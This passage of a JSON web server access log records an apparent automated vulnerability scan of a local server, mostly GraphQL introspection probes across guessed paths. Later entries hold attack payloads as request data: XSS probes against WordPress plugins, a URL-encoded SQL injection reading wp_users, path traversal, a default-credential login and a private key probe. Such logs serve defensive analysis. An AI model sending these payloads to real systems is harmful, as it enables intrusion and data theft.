}}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 